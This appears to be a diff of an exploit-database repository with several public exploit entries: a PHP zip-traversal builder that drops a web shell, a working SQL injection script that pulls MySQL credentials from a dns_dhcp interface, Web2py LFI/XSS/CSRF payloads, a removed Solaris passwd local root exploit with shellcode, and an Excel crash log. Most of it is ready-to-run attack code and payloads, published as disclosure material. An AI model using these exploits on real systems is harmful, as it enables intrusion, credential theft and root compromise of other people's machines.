if($argc<4){echo "Usage: <zip name>, <path depth>, <RCE.php as default?
Y/[file]>";exit();}
$zipname=$argv[1];
$exploit_file="RCE.php";
$cmd='<?php exec($_GET["cmd"]); ?>';
if(!empty($argv[2])&&is_numeric($argv[2])){
$depth=$argv[2];
}else{
echo "Second flag <path depth> must be numeric!, you supplied '$argv[2]'";
exit();
}
if(strtolower($argv[3])!="y"){
if(!empty($argv[3])){
$exploit_file=$argv[3];
}
if(!empty($argv[4])){
$cmd=$argv[4];
}else{
echo "Usage: enter a payload for file $exploit_file wrapped in double
quotes";
exit();
}
}
$zip = new ZipArchive();
$res = $zip->open("$zipname.zip", ZipArchive::CREATE);
$zip->addFromString(str_repeat("..\\", $depth).$exploit_file, $cmd);
$zip->close();
echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
echo "================ by hyp3rlinx ===================";
?>
/*
///////////////////////////////////////////////////////////////////////
[Script examples]
Use default RCE.php by passing "y" flag creating DOOM.zip with path depth
of 2 levels
c:\>php evil-archive.php DOOM 2 Y
Create DOOM.zip with path depth of 4 levels and .htaccess file to overwrite
one on the system.
c:\>php evil-archive.php DOOM 4 .htaccess "allow from all"
Disclosure Timeline:
===================================
Vendor Notification: No reply
May 14, 2016 : Public Disclosure
Exploitation Method:
======================
Local
Severity Level:
================
Medium 6.3
CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information.
hyp3rlinx
*/

150
platforms/php/webapps/39817.php Executable file
View file

@ -0,0 +1,150 @@
/*
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DNS_DHCP-WEB-INTERFACE-SQL-INJECTION.txt
[+] ISR: apparitionsec
Vendor:
====================
tmcdos / sourceforge
Product:
======================
dns_dhcp Web Interface
Download: sourceforge.net/projects/dnsmasq-mikrotik-admin/?source=directory
This is a very simple web interface for management of static DHCP leases in
DNSmasq and Mikrotik.
It generates config files for DNSmasq and uses RouterOS API to manage
Mikrotik. Network devices (usually PCs)
are separated into subnets by department and use triplets (hostname, MAC
address, IP address) for identification.
Information is stored in MySQL.
Vulnerability Type:
===================
SQL Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
The 'net' HTTP form POST parameter to dns.php script is not
checked/santized and is used directly in MySQL query allowing
attacker to easily exfiltrate any data from the backend database by using
SQL Injection exploits.
1) On line 239 of dns.php
$b = str_replace('{FIRMA}',a_select('SUBNET',$_REQUEST['net']),$b);
2)
dns.php line 187 the a_select function where 2nd argument $_REQUEST['net']
is passed to an concatenated to query ($clause)
and executed on line 194 mysql_query($query).
function a_select($tbl,$clause,$field='',$where='')
{
if ($clause==0) return '&#160;';
if($field=='') $field=$tbl;
$query = "SELECT $field FROM $tbl WHERE ";
if($where=='') $query.='ID='.$clause;
else $query.=$where;
$res = mysql_query($query) or
trigger_error($query.'<br>'.mysql_error(),E_USER_ERROR);
if(mysql_num_rows($res)>0) return mysql_result($res,0,0);
else return '&#160;';
}
Exploit code(s):
===============
Run from CL...
*/
<?php
#dns_dhcp SQL Injection Exploit
#exfiltrates host, user and password from MySQL
#by hyp3rlinx
#ISR - apparitionsec
#hyp3rlinx.altervista.org
#========================
$victim="localhost";
$url="/dns_dhcp/dns/dns.php";
$port=80;
$r='';
$s = fsockopen($victim, $port, $errno, $errstr, 30);
if(!$s){echo "Cant connect to the fucking server!"; exit();}
$sql="net=1 and (select 1 from(select count(*),concat((select (select
concat(0x2b,host,0x2b,user,0x2b,password,0x2b)) from mysql.user limit
1),floor(rand(0)*2))x from mysql.user group by x)a)";
$out = "POST $url HTTP/1.1\r\n";
$out .= "Host: $victim\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($sql) . "\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($s, $out);
fwrite($s, $sql);
while (!feof($s)) {
$r .= fgets($s, 128);
if(strpos($r,'Duplicate entry')!==FALSE){
$idx=strpos($r,'Duplicate entry');
echo substr($r,$idx);
break;
}
}
fclose($s);
/*
Example result:
Duplicate entry
'+localhost+root+*6691484EA6B50DDDE1926A220DA01FA9E575C18A+1' for key
'group_key'
*/
?>
/*
Disclosure Timeline:
===============================
Vendor Notification: NA
May 14, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
==================================================
Request Method(s): [+] POST
Vulnerable Product: [+] dns_dhcp Web Interface
Vulnerable Parameter(s): [+] 'net'
=====================================================
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
*/

104
platforms/python/webapps/39821.txt Executable file
View file

@ -0,0 +1,104 @@
Title - Web2py 2.14.5 Multiple Vulnerabilities LFI,XSS,CSRF
# Exploit Title : Web2py 2.14.5 Multiple Vulnerabilities LFI, XSS,CSRF
# Reported Date : 2-April-2016
# Fixed Date : 4-April-2016
# Exploit Author : Narendra Bhati - https://www.exploit-db.com/author/?a=7638
# CVE ID : LFI - CVE-2016-4806 , Reflected XSS - CVE-2016-4807 , CSRF - CVE-2016-4808
# Tested On : MAC OS X EI Capitan, Windows 7 64 Bit, Most Linux Platforms.
# Fix/Patching : Update To Web2py. 2.14.6
# Facebook : https://facebook.com/iambhati
# Twitter : http://twitter.com/NarendraBhatiB
# Detailed POC: http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
==============================================
LFI(Local File Inclusion): CVE-2016-4806
POST URI - /admin/default/pack_custom/[applicationmame]
Vulnerable Parameter = file
Exploit - file=/etc/passwd
Authentication Required = Yes(Administrator)
Steps To Reproduction
1) HTTP Request
POST /admin/default/pack_custom/[applicationname] HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/admin/default/pack_custom/dasdasdasdad
Cookie: session_id_welcome=asdadasdasdasdasd; session_id_admin=asdasdasdasdasd
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 3213
file=/etc/passwd
2) After sending this request, Application will prompt you with a file to download as an extension of "w2p".
3) Now we have to unpack this downloaded file using. https://github.com/pigeonflight/web2py-unpacker
I.e.
Command for unpacking w2p file
python web2py-unpacker.py downloadfile.w2p
4) This command will create a folder called "unpack", In this folder there will be an another folder of the application of web2py. In this folder you will found the etc folder, Then into this folder you will get the passwd file.
Video POC - https://www.youtube.com/watch?v=paCvmHgomP4
Full Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
========================================================================
Reflected XSS(Cross Site Scripting) : CVE-2016-4807
GET URI - http://127.0.0.1:8000/admin/default/install_plugin/dasdasdasdad?plugin=math2py&source=anyurl
Vulnerable Parameter - source
Exploit - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)
Authentication Required - Yes(Administrator)
Steps To Reproduction
1) Go to this URL - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)
2) The parameter "source" value will get reflected on the page on "Here" button.
3) When you will click on that button "Here" XSS payload will get executed.
Video POC - https://www.youtube.com/watch?v=4j9hXJtVNbk
Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
============================================================================
CSRF(Cross Site Request Forgery): CVE-2016-4808
GET URI - http://127.0.0.1:8000/admin/default/enable/[applicationname]
Exploit - http://127.0.0.1:8000/admin/default/enable/[applicationname]
Authenticated Required - Yes(Administrator)
Steps To Reproduction
1) Suppose we have an application in web2py called "testingapp"
2) An attacker can trick an victim to disable the installed application just By sending this URL to victim - http://127.0.0.1:8000/admin/default/enable/testingapp
Video POC - https://www.youtube.com/watch?v=d4V8qlNrYtk
Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/

574
platforms/solaris/local/23765.c
View file

@ -1,574 +0,0 @@
source: http://www.securityfocus.com/bid/9757/info
Sun has reported an unspecified vulnerability in the passwd utility on Solaris that may permit local attackers to gain unauthorized root privileges.
/*
* $Id: raptor_passwd.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9
* Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Unknown vulnerability in passwd(1) in Solaris 8.0 and 9.0 allows local users
* to gain privileges via unknown attack vectors (CAN-2004-0360).
*
* "Those of you lucky enough to have your lives, take them with you. However,
* leave the limbs you've lost. They belong to me now." -- Beatrix Kidd0
*
* This exploit uses the ret-into-ld.so technique, to effectively bypass the
* non-executable stack protection (noexec_user_stack=1 in /etc/system). The
* exploitation wasn't so straight-forward: sending parameters to passwd(1)
* is somewhat tricky, standard ret-into-stack doesn't seem to work properly
* for some reason (damn SEGV_ACCERR), and we need to bypass a lot of memory
* references before reaching ret. Many thanks to Inode <inode@deadlocks.info>.
*
* Usage:
* $ gcc raptor_passwd.c -o raptor_passwd -ldl -Wall
* $ ./raptor_passwd <current password>
* [...]
* # id
* uid=0(root) gid=1(other) egid=3(sys)
* #
*
* Vulnerable platforms:
* Solaris 8 with 108993-14 through 108993-31 and without 108993-32 [tested]
* Solaris 9 without 113476-11 [tested]
*/
#include <ctype.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <stropts.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9"
#define INFO2 "Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/bin/passwd" // target vulnerable program
#define BUFSIZE 256 // size of the evil buffer
#define VARSIZE 1024 // size of the evil env var
#define FFSIZE 64 + 1 // size of the fake frame
#define DUMMY 0xdeadbeef // dummy memory address
#define CMD "id;uname -a;uptime;\n" // execute upon exploitation
/* voodoo macros */
#define VOODOO32(_,__,___) {_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define VOODOO64(_,__,___) {_+=7-(_+(__+___+1)*4+3)%8;}
char sc[] = /* Solaris/SPARC shellcode (12 + 48 = 60 bytes) */
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
/* globals */
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_addr(int addr, char *pattern);
int find_pts(char **slave);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
void shell(int fd);
int read_prompt(int fd, char *buf, int size);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], var[VARSIZE], ff[FFSIZE];
char platform[256], release[256], cur_pass[256], tmp[256];
int i, offset, ff_addr, sc_addr, var_addr;
int plat_len, prog_len, rel;
char *arg[2] = {"foo", NULL};
int arg_len = 4, arg_pos = 1;
int pid, cfd, newpts;
char *newpts_str;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
int ret = search_ldso("strcpy");
int rwx_mem = search_rwx_mem();
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s current_pass\n\n", argv[0]);
exit(1);
}
sprintf(cur_pass, "%s\n", argv[1]);
/* get some system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
rel = atoi(release + 2);
/* prepare the evil buffer */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
buf[sizeof(buf) - 2] = '\n';
/* prepare the evil env var */
memset(var, 'B', sizeof(var));
var[sizeof(var) - 1] = 0x0;
/* prepare the fake frame */
bzero(ff, sizeof(ff));
/*
* saved %l registers
*/
set_val(ff, i = 0, DUMMY); /* %l0 */
set_val(ff, i += 4, DUMMY); /* %l1 */
set_val(ff, i += 4, DUMMY); /* %l2 */
set_val(ff, i += 4, DUMMY); /* %l3 */
set_val(ff, i += 4, DUMMY); /* %l4 */
set_val(ff, i += 4, DUMMY); /* %l5 */
set_val(ff, i += 4, DUMMY); /* %l6 */
set_val(ff, i += 4, DUMMY); /* %l7 */
/*
* saved %i registers
*/
set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */
set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */
set_val(ff, i += 4, DUMMY); /* %i2 */
set_val(ff, i += 4, DUMMY); /* %i3 */
set_val(ff, i += 4, DUMMY); /* %i4 */
set_val(ff, i += 4, DUMMY); /* %i5 */
set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */
set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */
/* fill the envp, keeping padding */
ff_addr = add_env(var); /* var must be before ff! */
sc_addr = add_env(ff);
add_env(sc);
add_env(NULL);
/* calculate the offset to argv[0] (voodoo magic) */
plat_len = strlen(platform) + 1;
prog_len = strlen(VULN) + 1;
offset = arg_len + env_len + plat_len + prog_len;
if (rel > 7)
VOODOO64(offset, arg_pos, env_pos)
else
VOODOO32(offset, plat_len, prog_len)
/* calculate the needed addresses */
var_addr = sb - offset + arg_len;
ff_addr += var_addr;
sc_addr += var_addr;
/* set fake frame's %i1 */
set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */
/* check the addresses */
check_addr(var_addr, "var_addr");
check_addr(ff_addr, "ff_addr");
/* fill the evil buffer */
for (i = 0; i < BUFSIZE - 4; i += 4)
set_val(buf, i, var_addr);
/* may need to bruteforce the distance here */
set_val(buf, 112, ff_addr);
set_val(buf, 116, ret - 4); /* strcpy(), after the save */
/* fill the evil env var */
for (i = 0; i < VARSIZE - 4; i += 4)
set_val(var, i, var_addr);
set_val(var, 0, 0xffffffff); /* first byte must be 0xff! */
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using var address\t: 0x%p\n", (void *)var_addr);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* find a free pts */
cfd = find_pts(&newpts_str);
/* fork() a new process */
if ((pid = fork()) < 0) {
perror("fork");
exit(1);
}
/* parent process */
if (pid) {
sleep(1);
/* wait for password prompt */
if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
fprintf(stderr, "Error: timeout waiting for prompt\n");
exit(1);
}
if (!strstr(tmp, "ssword: ")) {
fprintf(stderr, "Error: wrong prompt received\n");
exit(1);
}
/* send the current password */
write(cfd, cur_pass, strlen(cur_pass));
usleep(500000);
/* wait for password prompt */
if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
fprintf(stderr, "Error: timeout waiting for prompt\n");
exit(1);
}
if (!strstr(tmp, "ssword: ")) {
fprintf(stderr, "Error: wrong current_pass?\n");
exit(1);
}
/* send the evil buffer */
write(cfd, buf, strlen(buf));
usleep(500000);
/* got root? */
if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
fprintf(stderr, "Error: timeout waiting for shell\n");
exit(1);
}
if (strstr(tmp, "ssword: ")) {
fprintf(stderr, "Error: not vulnerable\n");
exit(1);
}
if (!strstr(tmp, "# ")) {
fprintf(stderr, "Something went wrong...\n");
exit(1);
}
/* semi-interactive shell */
shell(cfd);
/* child process */
} else {
/* start new session and get rid of controlling terminal */
if (setsid() < 0) {
perror("setsid");
exit(1);
}
/* open the new pts */
if ((newpts = open(newpts_str, O_RDWR)) < 0) {
perror("open");
exit(1);
}
/* ninja terminal emulation */
ioctl(newpts, I_PUSH, "ptem");
ioctl(newpts, I_PUSH, "ldterm");
/* close the child fd */
close(cfd);
/* duplicate stdin */
if (dup2(newpts, 0) != 0) {
perror("dup2");
exit(1);
}
/* duplicate stdout */
if (dup2(newpts, 1) != 1) {
perror("dup2");
exit(1);
}
/* duplicate stderr */
if (dup2(newpts, 2) != 2) {
perror("dup2");
exit(1);
}
/* close the new pts */
if (newpts > 2)
close(newpts);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
}
exit(0);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return(env_len);
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return(env_len);
}
/*
* check_addr(): check an address for 0x00, 0x04, 0x0a, 0x0d or 0x61-0x7a bytes
*/
void check_addr(int addr, char *pattern)
{
/* check for NULL byte (0x00) */
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
exit(1);
}
/* check for EOT byte (0x04) */
if (((addr & 0xff) == 0x04) || ((addr & 0xff00) == 0x0400) ||
((addr & 0xff0000) == 0x040000) ||
((addr & 0xff000000) == 0x04000000)) {
fprintf(stderr, "Error: %s contains a 0x04!\n", pattern);
exit(1);
}
/* check for NL byte (0x0a) */
if (((addr & 0xff) == 0x0a) || ((addr & 0xff00) == 0x0a00) ||
((addr & 0xff0000) == 0x0a0000) ||
((addr & 0xff000000) == 0x0a000000)) {
fprintf(stderr, "Error: %s contains a 0x0a!\n", pattern);
exit(1);
}
/* check for CR byte (0x0d) */
if (((addr & 0xff) == 0x0d) || ((addr & 0xff00) == 0x0d00) ||
((addr & 0xff0000) == 0x0d0000) ||
((addr & 0xff000000) == 0x0d000000)) {
fprintf(stderr, "Error: %s contains a 0x0d!\n", pattern);
exit(1);
}
/* check for lowercase chars (0x61-0x7a) */
if ((islower(addr & 0xff)) || (islower((addr & 0xff00) >> 8)) ||
(islower((addr & 0xff0000) >> 16)) ||
(islower((addr & 0xff000000) >> 24))) {
fprintf(stderr, "Error: %s contains a 0x61-0x7a!\n", pattern);
exit(1);
}
}
/*
* find_pts(): find a free slave pseudo-tty
*/
int find_pts(char **slave)
{
int master;
extern char *ptsname();
/* open master pseudo-tty device and get new slave pseudo-tty */
if ((master = open("/dev/ptmx", O_RDWR)) > 0) {
grantpt(master);
unlockpt(master);
*slave = ptsname(master);
return(master);
}
return(-1);
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_addr(addr - 4, sym);
return(addr);
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address NULL bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return(addr_old);
}
/*
* set_val(): copy a dword inside a buffer
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0xff000000) >> 24;
buf[pos + 1] = (val & 0x00ff0000) >> 16;
buf[pos + 2] = (val & 0x0000ff00) >> 8;
buf[pos + 3] = (val & 0x000000ff);
}
/*
* shell(): semi-interactive shell hack
*/
void shell(int fd)
{
fd_set fds;
char tmp[128];
int n;
/* quote from kill bill: vol. 2 */
fprintf(stderr, "\"Pai Mei taught you the five point palm exploding heart technique?\" -- Bill\n");
fprintf(stderr, "\"Of course.\" -- Beatrix Kidd0, alias Black Mamba, alias The Bride (KB Vol2)\n\n");
/* execute auto commands */
write(1, "# ", 2);
write(fd, CMD, strlen(CMD));
/* semi-interactive shell */
for (;;) {
FD_ZERO(&fds);
FD_SET(fd, &fds);
FD_SET(0, &fds);
if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
perror("select");
break;
}
/* read from fd and write to stdout */
if (FD_ISSET(fd, &fds)) {
if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
fprintf(stderr, "Goodbye...\n");
break;
}
if (write(1, tmp, n) < 0) {
perror("write");
break;
}
}
/* read from stdin and write to fd */
if (FD_ISSET(0, &fds)) {
if ((n = read(0, tmp, sizeof(tmp))) < 0) {
perror("read");
break;
}
if (write(fd, tmp, n) < 0) {
perror("write");
break;
}
}
}
close(fd);
exit(1);
}
/*
* read_prompt(): non-blocking read from fd
*/
int read_prompt(int fd, char *buf, int size)
{
fd_set fds;
struct timeval wait;
int n = -1;
/* set timeout */
wait.tv_sec = 2;
wait.tv_usec = 0;
bzero(buf, size);
FD_ZERO(&fds);
FD_SET(fd, &fds);
/* select with timeout */
if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) {
perror("select");
exit(1);
}
/* read data if any */
if (FD_ISSET(fd, &fds))
n = read(fd, buf, size);
return n;
}

228
platforms/windows/dos/39819.txt Executable file
View file

@ -0,0 +1,228 @@
Microsoft Office is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected application.
----------------------------------------------------------------------
Found : 11.05.2016
More: http://HauntIT.blogspot.com
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39819.zip
----------------------------------------------------------------------
Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.
CommandLine: "c:\Program Files\Microsoft Office\Office14\excel.EXE" C:\crash\sf_e626c69c89ab9e683eed52eeaaac93ca-109922.xlsx
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path. *
* Use .symfix to have the debugger choose a symbol path. *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
ModLoad: 30000000 313d1000 Excel.exe
ModLoad: 7c900000 7c9af000 ntdll.dll
ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
(...)
ModLoad: 6bdc0000 6be7c000 C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL
ModLoad: 65100000 6519e000 C:\Program Files\Common Files\Microsoft Shared\OFFICE14\USP10.DLL
(cb4.854): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d
eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\OFFICE14\OGL.DLL -
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
0:000> r;!exploitable -v;r;ub;kv;q
eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d
eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
!exploitable 1.6.0.0
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
(...)
Exception Faulting Address: 0x4
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation
Faulting Instruction:44175083 push dword ptr [ecx+4]
Basic Block:
44175083 push dword ptr [ecx+4]
Tainted Input operands: 'ecx'
44175086 push dword ptr [ecx]
Tainted Input operands: 'ecx'
44175088 mov ecx,dword ptr [ebp+8]
4417508b mov eax,dword ptr [ecx]
4417508d call dword ptr [eax+4]
Tainted Input operands: 'StackContents'
Exception Hash (Major/Minor): 0xd8abe4f2.0x3a6d64a1
Hash Usage : Stack Trace:
Major+Minor : OGL!GdipGetImageThumbnail+0x1118e
Major+Minor : OGL!GdipGetPathPointsI+0x2da6
Major+Minor : OGL!GdipGetPathPointsI+0x2b0e
Major+Minor : OGL!GdipGetPathPointsI+0x2a98
Major+Minor : GDI32!SetMetaRgn+0x87
Minor : OGL!GdipCreateMetafileFromWmfFile+0x652
Minor : OGL!GdipGetPathPointsI+0x2d1b
Minor : OGL!GdipGetPathPointsI+0x2b73
Minor : OGL!GdipCreateMetafileFromWmfFile+0x573
Minor : OGL!GdipGetVisibleClipBoundsI+0x1c6
Minor : OGL!GdipDrawImageRectRect+0x111
Minor : gfx+0x147d74
Minor : gfx+0x4f9f
Minor : gfx+0x13ec8
Minor : gfx+0x13ec8
Minor : gfx+0x13ec8
Minor : gfx+0x4ecd
Minor : gfx+0xed1a
Minor : gfx+0xecef
Minor : gfx+0xecc3
Minor : gfx+0xf6fc
Minor : gfx+0xe84d
Minor : gfx+0xf4db
Minor : gfx+0xe84d
Minor : gfx+0xf685
Minor : gfx+0xe817
Minor : gfx+0xebd8
Minor : oart!Ordinal3680+0xb8
Minor : oart!Ordinal1491+0x156
Minor : Excel!Ordinal40+0x20d620
Minor : Excel!Ordinal40+0x1f8e2c
Minor : Excel!Ordinal40+0x60961
Minor : Excel!Ordinal40+0x607aa
Minor : Excel!Ordinal40+0x5e95b
Minor : Excel!Ordinal40+0x5e76f
Minor : Excel!Ordinal40+0x2f054
Minor : Excel!Ordinal40+0x1763d
Minor : USER32!GetDC+0x6d
Minor : USER32!GetDC+0x14f
Minor : USER32!IsWindowUnicode+0xa1
Minor : USER32!CallWindowProcW+0x1b
Minor : Comctl32!Ordinal11+0x328
Minor : Comctl32!RemoveWindowSubclass+0x17e
Minor : Comctl32!DefSubclassProc+0x46
Minor : mso!Ordinal1888+0x38e
Minor : mso!Ordinal4894+0x24b
Minor : Comctl32!RemoveWindowSubclass+0x17e
Minor : Comctl32!DefSubclassProc+0xa9
Minor : USER32!GetDC+0x6d
Minor : USER32!GetDC+0x14f
Minor : USER32!DefWindowProcW+0x180
Minor : USER32!DefWindowProcW+0x1cc
Minor : ntdll!KiUserCallbackDispatcher+0x13
Minor : USER32!DispatchMessageW+0xf
Minor : Excel!Ordinal40+0x24572
Minor : Excel!Ordinal40+0x24441
Minor : Excel!Ordinal40+0x424b
Minor : Excel!Ordinal40+0x3f0a
Minor : kernel32!RegisterWaitForInputIdle+0x49
Instruction Address: 0x0000000044175083
Description: Read Access Violation near NULL
Short Description: ReadAVNearNull
Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
Recommended Bug Title: Read Access Violation near NULL starting at OGL!GdipGetImageThumbnail+0x000000000001118e (Hash=0xd8abe4f2.0x3a6d64a1)
This is a user mode read access violation near null, and is probably not exploitable.
----------------------------------------------------------------------
More:
> r
eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d
eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
OGL!GdipGetImageThumbnail+0x1118e:
44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
> ub
OGL!GdipGetImageThumbnail+0x1117b:
44175070 8b01 mov eax,dword ptr [ecx]
44175072 ff5004 call dword ptr [eax+4]
44175075 8bc8 mov ecx,eax
44175077 e88e4af0ff call OGL!GdipGetPathPointsI+0x40d5 (44079b0a)
